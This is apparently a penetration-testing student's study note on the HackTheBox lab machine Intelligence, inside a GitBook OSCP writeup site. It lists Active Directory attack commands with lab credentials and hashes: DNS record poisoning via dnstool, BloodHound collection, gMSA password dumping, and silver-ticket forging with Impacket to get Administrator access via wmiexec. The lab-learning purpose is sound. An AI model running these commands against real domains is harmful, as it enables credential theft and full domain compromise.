Braindump
Read BlogpostsLet's Connect
  • Introduction: My OSCP Journey
  • Writeup Index
  • OSCP Machine Writeups
    • 🔥PG - Practice
      • Shenzi
      • DVR4
      • Resourced
      • Kevin
      • Nara
      • Jacko
      • Authby
      • Access
      • Internal
      • Hutch
      • Algernon
      • HelpDesk
      • Squid
      • Hepet
      • Craft2
      • ClamAV
      • Pelican
      • Payday
      • Snookums
      • Bratarina
      • Nibbles
      • Hetemit
      • Hawat
      • Astronaut
      • Exfiltrated
      • Fanatastic
      • Wombo
      • Levram
      • LaVita
    • 💣HackTheBox
      • Devel
      • Legacy
      • Intelligence
        • Learning
      • Blackfield
        • PrivEsc - SeBackupPrivilege
      • Sauna
      • Bastard
      • Arctic
      • Forest
      • Active
      • SecNotes
      • Access
  • Preparation Notes
    • Tips and Tricks
      • File Transfer
      • Download a file - Windows CLI
      • Bypassing Firewall/Defender/UAC
      • Accessing File
      • Reverse Shell
      • OneLiner - Reverse/bind Shell
      • OneLiner - MSFVenom
    • Enumeration Techniques
      • System and Network Enumeration
      • Web Enumeration
      • Service Enum
      • CMS
    • Exploitation
      • Exploiting Web Apps
      • Exploiting Wordpress
      • Public Exploits
    • Privilege Escalation
      • Linux Privilege Escalation
        • Disk Group PrivEsc
      • Windows Privilege Escalation
    • Active Directory
      • Enumeration
      • AD Attacks
      • mimikatz
      • Lateral movement
    • Pivoting and Networking
      • SSH Port Forwarding
      • Ligolo-ng
    • Password Cracking
Powered by GitBook
On this page
  • Learnt an efficient way to use
  • Learnt about Kerberos relay attack using DNS configuration
  • Learnt about running Bloodhound using CLI, without needing to use sharphound
  • Learnt About new Active directory misconfiguration: Reading gMSA password blobs using the following tool
  • Learnt about fixing Skewed clock, which is required to create silver ticket
  • Learnt About creating Silver ticket using Impacket
  • Learnt about Injecting the silver ticket into env variable and using it to the machine

Was this helpful?

  1. OSCP Machine Writeups
  2. HackTheBox
  3. Intelligence

Learning

PreviousIntelligenceNextBlackfield

Last updated 8 days ago

Was this helpful?

Learnt an efficient way to use

  • smbclient

  • crackmapexec

Learnt about Kerberos relay attack using DNS configuration

./dnstool.py  -u 'Tiffany.Molina' -p `cat ../pass.txt` 10.10.10.248 -a add -r webl -d 10.10.14.13 -t A

Learnt about running Bloodhound using CLI, without needing to use sharphound

bloodhound-python -d intelligence.htb -u Ted.Graves -p Mr.Teddy -ns 10.10.10.248 -c All

Learnt About new Active directory misconfiguration: Reading gMSA password blobs using the following tool

python gMSADumper.py -u user -p e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c -d domain.local -l dc01.domain.local

Learnt about fixing Skewed clock, which is required to create silver ticket

In case of clock skew too great error, refer this blog
<https://medium.com/@danieldantebarnes/fixing-the-kerberos-sessionerror-krb-ap-err-skew-clock-skew-too-great-issue-while-kerberoasting-b60b0fe20069> 

Learnt About creating Silver ticket using Impacket

Impacket-getST -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes :51e4932f13712047027300f869d07ab6

Learnt about Injecting the silver ticket into env variable and using it to the machine

export KRB5CCNAME=Administrator.ccache

echo "10.10.10.248 dc.intelligence.htb" | sudo tee -a /etc/hosts

impacket-wmiexec -k -no-pass dc.intelligence.htb

-k Use Kerberos authentication. Grab credentials from ccache file (KRB5CCNAME) based on the target parameter
💣
https://github.com/dirkjanm/krbrelayx/tree/master
https://github.com/micahvandeusen/gMSADumper